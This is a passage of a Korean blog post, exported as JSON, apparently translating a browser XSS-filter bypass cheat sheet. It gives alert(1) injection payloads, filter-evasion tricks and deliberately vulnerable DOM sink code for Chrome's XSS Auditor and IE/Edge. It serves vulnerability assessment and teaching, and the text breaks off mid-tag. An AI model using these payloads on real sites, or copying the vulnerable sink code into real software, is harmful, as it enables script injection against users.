{"id":146,"date":"2019-03-28T06:02:12","date_gmt":"2019-03-28T06:02:12","guid":{"rendered":"https:\/\/blog.rubiya.kr\/?p=146"},"modified":"2019-04-01T13:16:48","modified_gmt":"2019-04-01T04:16:48","slug":"browsers-xss-filter-bypass-cheat-sheet","status":"publish","type":"post","link":"https:\/\/blog.rubiya.kr\/index.php\/2019\/03\/28\/browsers-xss-filter-bypass-cheat-sheet\/","title":{"rendered":"\ube0c\ub77c\uc6b0\uc800 XSS \ud544\ud130 \uc6b0\ud68c\uc758 \ubaa8\ub4e0 \uac83"},"content":{"rendered":"\n<p>\uc774 \uae00\uc740 XSS Auditor, XSS \ud544\ud130\uc758 \uc6b0\ud68c\uc5d0 \ub300\ud574 \ub2e4\ub8e8\uace0 \uc788\ub2e4.<br>\ub300\uc0c1\uc740 Chrome, Firefox, Edge, IE11, Safari, Opera \uc774\ub2e4.<br>\ub9cc\uc57d \ub2f9\uc2e0\uc774 \ucde8\uc57d\uc810 \uc9c4\ub2e8 \uc5c5\ubb34\ub97c \ud558\uace0\uc788\ub2e4\uba74 XSS \ud544\ud130\uc758 \uc6b0\ud68c\uac00 \uac00\ub2a5\ud558\ub2e4\ub294 \uc0ac\uc2e4\uc744 \ub110\ub9ac \uc54c\ub9ac\uae30 \uc704\ud574\uc11c \ub354 \ub9ce\uc740 \uc6b0\ud68c \ubc29\ubc95\uc744 \ucc3e\uc544\uc11c \uc54c\ub824\uc8fc\uc2ed\uc2dc\uc624.<br>\ub610\ud55c \uc774 \uae00\uc740 \uc77c\ubc18\uc801\uc778 \uc0c1\ud669\uc5d0\uc11c \uc6b0\ud68c \uac00\ub2a5\ud55c \ucf00\uc774\uc2a4\uc5d0 \ub300\ud574\uc11c\ub9cc \ub2e4\ub8e8\uace0 \uc788\ub2e4.<br>\uc5ec\uae30\uc5d0\uc11c \ub2e4\ub8e8\uc9c0 \uc54a\ub354\ub77c\ub3c4 \uc2e4\uc81c \uc0c1\ud669\uc5d0\uc11c\ub294 \ub354 \ub2e4\uc591\ud55c \ubc29\ubc95\uc774 \uc788\uc744 \uc218 \uc788\ub2e4.<br>\ub2f9\uc2e0\uc774 \ubcf4\uc548 \ub2f4\ub2f9\uc790\ub77c\uba74 XSS \ud544\ud130\uc758 \uc874\uc7ac\uc640 \uad00\uacc4\uc5c6\uc774 \uadfc\ubcf8\uc801\uc778 XSS \ub300\ucc45\uc744 \uc218\ub9bd\ud558\ub294\uac83\uc744 \uad8c\uc7a5\ud55c\ub2e4.<br><\/p>\n\n\n\n<blockquote class=\"wp-block-quote\"><p>MS Edge\ub294 Windows 10 Build 17723 \ubd80\ud130 XSS \ud544\ud130\uac00 <a href=\"https:\/\/blogs.windows.com\/windowsexperience\/2018\/07\/25\/announcing-windows-10-insider-preview-build-17723-and-build-18204\/\">\uc0ad\uc81c<\/a>\ub418\uc5c8\ub2e4.<br>\uc774 \uae00\uc5d0\uc11c Edge \ube0c\ub77c\uc6b0\uc800\ub294 XSS \ud544\ud130\uac00 \uc544\uc9c1 \uc874\uc7ac\ud558\ub294 \ubc84\uc804\uc744 \uc0ac\uc6a9\ud574 \ud14c\uc2a4\ud2b8\ub418\uc5c8\ub2e4.<\/p><\/blockquote>\n\n\n\n<h1 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E7%9B%AE%E6%AC%A1\"><\/a>\ubaa9\ucc28<\/h1>\n\n\n\n<ul><li>XSS Auditor(Chromium)<ul><li>\ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83<ul><li>\ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 XSS<\/li><li>URL \ub2e8\ub3c5\uc73c\ub85c \uc131\ub9bd\ud558\ub294 XSS(\uc785\ub825\uac12\uc774 a\ud0dc\uadf8\uc758 href\uc18d\uc131\uc5d0 \uc9c1\uc811 \ub4e4\uc5b4\uac00\ub294 \uacbd\uc6b0)<\/li><li>2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0<\/li><li>\ubb38\uc790\uc5f4\uc774 \uc870\uc791\ub418\ub294 \uacbd\uc6b0<ul><li>\uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0<\/li><li>\uce58\ud658\ub418\ub294 \uacbd\uc6b0<\/li><\/ul><\/li><li>Request\uac12\uc744 document.write() \ud558\ub294 \uacbd\uc6b0\ub97c \uc81c\uc678\ud55c DOM based XSS<\/li><li>XML \ud398\uc774\uc9c0\uc5d0\uc11c\uc758 XSS<\/li><li>http(s): \ub9c1\ud06c \ub9cc\ub4e4\uae30<\/li><li>\uc678\ubd80\ub85c Request\ub97c \ub9cc\ub4e4 \uc218 \uc788\ub294 \ud0dc\uadf8<\/li><li>\uc784\uc758\uc758 CSS \uc2e4\ud589<\/li><\/ul><\/li><li>\ud544\ud130 \uc6b0\ud68c<ul><li>SVG \uc560\ub2c8\uba54\uc774\uc158 \ud6a8\uacfc\uc758 values \uc18d\uc131\uc744 \uc0ac\uc6a9<\/li><li>\uc5ec\ub7ec\uac1c\uc758 null\ubb38\uc790\ub97c \uc0ac\uc6a9<\/li><li>script\ud0dc\uadf8\uc758 -\u200b-> \uc8fc\uc11d\uc744 \uc0ac\uc6a9<\/li><li>\uc5b4\uc911\uac04\ud55c base \ud0dc\uadf8\uc758 \uc0ac\uc6a9<ul><li>Flash \uc0ac\uc6a9<\/li><li>\uc0c1\ub300\uacbd\ub85c\ub85c js\ud30c\uc77c\uc744 \ub85c\ub4dc\ud558\ub294 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9<\/li><\/ul><\/li><li>ISO-2022-JP \uc774\uc2a4\ucf00\uc774\ud504 \uc2dc\ud000\uc2a4 \uc0ac\uc6a9<\/li><li>\ub3d9\uc77c\ud55c \ub3c4\uba54\uc778\uc758 \ub9ac\uc18c\uc2a4 \uc0ac\uc6a9<ul><li>Path\ub97c \uc0ac\uc6a9\ud55c XSS<\/li><li>\ud30c\uc77c \uc5c5\ub85c\ub4dc \uae30\ub2a5 \uc0ac\uc6a9<\/li><li>Flash\uc640 flashvars\uc758 \uc0ac\uc6a9<\/li><li>Flash\uc640ExternalInterface.objectID\uc640 ExternalInterface.call()\uc758 \uc0ac\uc6a9<\/li><li>Angular\uc758 \uc0ac\uc6a9<\/li><li>Vue.js\uc758 \uc0ac\uc6a9<\/li><li>jQuery\uc758 \uc0ac\uc6a9<\/li><li>underscore.js\uc758 \uc0ac\uc6a9<\/li><li><a href=\"https:\/\/github.com\/facebookarchive\/jstransform\">JSXTransformer<\/a>\/<a href=\"https:\/\/github.com\/babel\/babel-standalone\">babel-standalone<\/a>\ub4f1\uc758 JSX \ubcc0\ud658 \uc2a4\ud06c\ub9bd\ud2b8 \uc0ac\uc6a9<\/li><\/ul><\/li><li>document.write()\ub420 \ub54c \uc5b4\uc911\uac04\ud55c \ud0dc\uadf8\ub97c \uc0ac\uc6a9<\/li><li>\uc5b4\uc911\uac04\ud55c form\ud0dc\uadf8\uc758 \uc0ac\uc6a9(\ubbfc\uac10 \uc815\ubcf4 \ucde8\ub4dd \uac00\ub2a5)<\/li><\/ul><\/li><\/ul><\/li><li>IE\/Edge\uc758 XSS \ud544\ud130<ul><li>\ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83<ul><li> \ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 XSS <\/li><li>\uc644\uc804\ud55c DOM based XSS<\/li><li> 2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0 <\/li><li>\ubb38\uc790\uc5f4 \uc870\uc791\uc774 \uc788\ub294 \uacbd\uc6b0<ul><li>\uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0<\/li><li>\uce58\ud658\ub418\ub294 \uacbd\uc6b0<\/li><\/ul><\/li><li>\uc678\ubd80\uc5d0 \uc694\uccad\uc744 \ubcf4\ub0bc \uc218 \uc788\ub294 \ud0dc\uadf8<\/li><\/ul><\/li><li>\ud544\ud130 \uc6b0\ud68c<ul><li><strike>XML namespace\ub85c \uc704\uc7a5\ud55c \ubb38\uc790\uc5f4 \uc0ac\uc6a9<\/strike><\/li><li>HZ-GB-2312 \uc774\uc2a4\ucf00\uc774\ud504 \uc2dc\ud000\uc2a4 \uc0ac\uc6a9<\/li><li>\ud398\uc774\uc9c0 \uc774\ub3d9\uc2dc\uc758 \uc778\ucf54\ub529 \ub3d9\uc791\uc758 \uc774\uc6a9<\/li><li><strike>Adobe Acrobat Reader \ud50c\ub7ec\uadf8\uc778\uc744 \uc0ac\uc6a9<\/strike><\/li><li>XML\uc744 \uc774\uc6a9\ud55c Content Sniffing<\/li><li>UTF-7 <a href=\"https:\/\/en.wikipedia.org\/wiki\/UTF-7#Unicode_signature\">BOM<\/a>\uc744 \uc0ac\uc6a9<\/li><li>&lt;?PXML>\uc744 \uc0ac\uc6a9<\/li><li>referer\ub97c \uc0ac\uc6a9<ul><li>\uac19\uc740 \ub3c4\uba54\uc778(\uc11c\ube0c\ub3c4\uba54\uc778 \ud3ec\ud568) \ub0b4\uc5d0 \uc788\ub294 \ub9c1\ud06c \uc0ac\uc6a9<\/li><li>2\uc911\uc73c\ub85c \ub9c1\ud06c\ub97c \uac78\uc5b4 referer \uc0dd\uc131<\/li><li>\ucde8\uc57d\ud55c form\uc758 \uc804\uc1a1 \uc774\uc804\uc758 \uc0c1\ud0dc\ub97c \uc870\uc791 \uac00\ub2a5\ud55c \uacbd\uc6b0<\/li><li>option\ud0dc\uadf8\uc758 \uc0ac\uc6a9<\/li><li>\ube44\uc5b4\uc788\ub294 iframe\ud0dc\uadf8\uc758 \uc0ac\uc6a9<\/li><\/ul><\/li><li>formaction\uc758 \uc0ac\uc6a9 (\ubbfc\uac10 \uc815\ubcf4 \ucde8\ub4dd \uac00\ub2a5) <\/li><li>CSS\uc758 \ucc38\uc870 \uad6c\ubb38 \uc774\uc6a9(CSS \uac12 \uc870\uc791 \uac00\ub2a5\uc2dc)<\/li><\/ul><\/li><\/ul><\/li><\/ul>\n\n\n\n<h1 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#xss-auditor\"><\/a>XSS Auditor<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E9%81%AE%E6%96%AD%E5%AF%BE%E8%B1%A1%E3%81%A7%E3%81%AA%E3%81%84%E3%82%82%E3%81%AE\"><\/a>\ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83<\/h2>\n\n\n\n<p>\ucc98\uc74c\ubd80\ud130 \ud544\ud130\ub9c1\uc774 \uc801\uc6a9\ub418\uc9c0 \uc54a\ub294 \uc0c1\ud669\uc5d0\uc11c\ub294 \ubcc4\ub2e4\ub978 \uc870\uc791\uc5c6\uc774 \uc2a4\ud06c\ub9bd\ud2b8\uc758 \uc2e4\ud589\uc774 \uac00\ub2a5\ud568<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E6%96%87%E5%AD%97%E5%88%97%E3%83%AA%E3%83%86%E3%83%A9%E3%83%AB%E3%81%A7%E8%B5%B7%E3%81%93%E3%82%8Bxss\"><\/a>\ubb38\uc790\uc5f4 \ub9ac\ud130\ub7f4\uc5d0\uc11c \uc77c\uc5b4\ub098\ub294 XSS<\/h3>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/str_literal?q=%22%3Balert(1)\/\/\">https:\/\/vulnerabledoma.in\/bypass\/str_literal?q=%22%3Balert(1)\/\/<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script&gt;var q=\"\";alert(1)\/\/\"&lt;\/script&gt;<br><\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#url%E5%8D%98%E7%8B%AC%E3%81%A7%E6%88%90%E7%AB%8B%E3%81%99%E3%82%8Bxss%E5%85%A5%E5%8A%9B%E5%80%A4%E3%81%8C%E7%9B%B4%E6%8E%A5a%E3%82%BF%E3%82%B0%E3%81%AEhref%E9%83%A8%E5%88%86%E3%81%AB%E5%85%A5%E3%82%8B%E5%A0%B4%E5%90%88%E3%81%AA%E3%81%A9\"><\/a>URL \ub2e8\ub3c5\uc73c\ub85c \uc131\ub9bd\ud558\ub294 XSS(\uc785\ub825\uac12\uc774 a\ud0dc\uadf8\uc758 href\uc18d\uc131\uc5d0 \uc9c1\uc811 \ub4e4\uc5b4\uac00\ub294 \uacbd\uc6b0)<\/h3>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/link?q=javascript:alert(1)\">https:\/\/vulnerabledoma.in\/bypass\/link?q=javascript:alert(1)<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;a href=\"javascript:alert(1)\"&gt;Link&lt;\/a&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#2%E3%81%A4%E4%BB%A5%E4%B8%8A%E3%81%AE%E6%B3%A8%E5%85%A5%E3%83%9D%E3%82%A4%E3%83%B3%E3%83%88%E3%81%8C%E3%81%82%E3%82%8B%E5%A0%B4%E5%90%88\"><\/a>2\uac1c \uc774\uc0c1\uc758 \uc778\uc81d\uc158 \ud3ec\uc778\ud2b8\uac00 \uc788\ub294 \uacbd\uc6b0<\/h3>\n\n\n\n<p>(\ucc28\ub2e8\ud560 \uc218 \uc788\uc744\uac83\uc73c\ub85c \ubcf4\uc774\uc9c0\ub9cc, \uacfc\uac70\uc5d0 \ubcf4\uace0\ub41c \ucf00\uc774\uc2a4\uc5d0\uc11c ( <a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=96616\">#96616<\/a>&nbsp;<a href=\"https:\/\/bugs.chromium.org\/p\/chromium\/issues\/detail?id=403636\">#403636<\/a> ) Will not Fix \ub97c \ubc1b\uc558\uae30\uc5d0, \ucc28\ub2e8 \ub300\uc0c1\uc774 \uc544\ub2cc \uac83\uc73c\ub85c \ubd84\ub958\ud568)<\/p>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=2&amp;q=%60-alert(1)%3C\/script%3E%3Cscript%3E%60\">https:\/\/vulnerabledoma.in\/bypass\/text?type=2&amp;q=%60-alert(1)%3C\/script%3E%3Cscript%3E%60<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;div&gt;`-alert(1)&lt;\/script&gt;&lt;script&gt;`&lt;\/div&gt;\n&lt;div&gt;`-alert(1)&lt;\/script&gt;&lt;script&gt;`&lt;\/div&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E6%96%87%E5%AD%97%E5%88%97%E3%81%AE%E6%93%8D%E4%BD%9C%E3%81%8C%E3%81%82%E3%82%8B%E5%A0%B4%E5%90%88\"><\/a> \ubb38\uc790\uc5f4\uc774 \uc870\uc791\ub418\ub294 \uacbd\uc6b0 <\/h3>\n\n\n\n<p>\uc77c\ubd80 \ubb38\uc790\uc5f4\uc774 \uc0ad\uc81c\ub418\uac70\ub098 \uce58\ud658\ub420 \ub54c \ud574\ub2f9 \ubb38\uc790\uc5f4\uc744 \ud398\uc774\ub85c\ub4dc \uc0ac\uc774\uc5d0 \ub123\uc5b4 \ucc28\ub2e8\uc744 \uc6b0\ud68c\ud560 \uc218 \uc788\uc74c<\/p>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E5%89%8A%E9%99%A4%E3%81%95%E3%82%8C%E3%82%8B%E5%A0%B4%E5%90%88\"><\/a>\uc0ad\uc81c\ub418\ub294 \uacbd\uc6b0<\/h4>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=6&amp;q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?type=6&amp;q=%3Csvg%20o%3Cscript%3Enload=alert(1)%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;svg o&lt;script&gt;nload=alert(1)&gt;\n\u2193\n&lt;svg onload=alert(1)&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h4 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E7%BD%AE%E6%8F%9B%E3%81%95%E3%82%8C%E3%82%8B%E5%A0%B4%E5%90%88\"><\/a>\uce58\ud658\ub418\ub294 \uacbd\uc6b0<\/h4>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/text?type=7&amp;q=%3Cscript%3E\/%26\/-alert(1)%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/text?type=7&amp;q=%3Cscript%3E\/%26\/-alert(1)%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script&gt;\/&amp;\/-alert(1)&lt;\/script&gt;\n\u2193\n&lt;script&gt;\/&amp;amp;\/-alert(1)&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>X<\/td><td>X<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#%E3%83%AA%E3%82%AF%E3%82%A8%E3%82%B9%E3%83%88%E6%96%87%E5%AD%97%E5%88%97%E3%82%92documentwrite%E3%81%99%E3%82%8B%E3%82%82%E3%81%AE%E4%BB%A5%E5%A4%96%E3%81%AEdom-based-xss\"><\/a>Request\uac12\uc744 document.write() \ud558\ub294 \uacbd\uc6b0\ub97c \uc81c\uc678\ud55c DOM based XSS<\/h3>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E\">https:\/\/vulnerabledoma.in\/bypass\/dom_innerhtml#%3Cimg%20src=x%20onerror=alert(1)%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;body&gt;\n&lt;script&gt;\nhash=location.hash.slice(1);\ndocument.body.innerHTML=decodeURIComponent(hash);\n&lt;\/script&gt;\n&lt;\/body&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/dom_redirect#javascript:alert(1)\">https:\/\/vulnerabledoma.in\/bypass\/dom_redirect#javascript:alert(1)<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;script&gt;\nlocation.href=decodeURIComponent(location.hash.slice(1));\n&lt;\/script&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<h3 class=\"wp-block-heading\"><a href=\"https:\/\/github.com\/masatokinugawa\/filterbypass\/wiki\/Browser's-XSS-Filter-Bypass-Cheat-Sheet#xml%E3%83%9A%E3%83%BC%E3%82%B8%E3%81%A7%E3%81%AExss\"><\/a>XML \ud398\uc774\uc9c0\uc5d0\uc11c\uc758 XSS<\/h3>\n\n\n\n<p><a href=\"https:\/\/vulnerabledoma.in\/bypass\/xml?q=%3Cscript%20xmlns=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert(1)%3C\/script%3E\">https:\/\/vulnerabledoma.in\/bypass\/xml?q=%3Cscript%20xmlns=%22http:\/\/www.w3.org\/1999\/xhtml%22%3Ealert(1)%3C\/script%3E<\/a><\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">&lt;?xml version=\"1.0\"?&gt;&lt;html&gt;&lt;script xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\"&gt;alert(1)&lt;\/script&gt;&lt;\/html&gt;<\/pre>\n\n\n\n<table class=\"wp-block-table\"><tbody><tr><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/chrome.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/firefox.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/edge.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/ie.png\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/opera.svg\" width=\"42px\" height=\"42px\"><\/td><td><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/rubiya.kr\/static\/safari_256x256.png\" width=\"42px\" height=\"42px\"><\/td><\/tr><tr><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><td>O<\/td><\/tr><\/tbody><\/table>\n\n\n\n<p>\ud639\uc740 \ud398\uc774\uc9c0\uc758 \uac00\uc7a5 \uc55e\uc5d0 \ubb38\uc790\uc5f4\uc744 \uc4f8 \uc218 \uc788\uc73c\uba70, Content-Type\uc774 text\/html\ub85c \uc124\uc815\ub418\uc9c0 \uc54a\uace0, Content Sniffing\uc774 \uac00\ub2a5\ud55c \uacbd\uc6b0\uc5d0\ub3c4 \uc6b0\ud68c\uac00 \uac00\ub2a5<\/p>\n\n\n\n<p><a 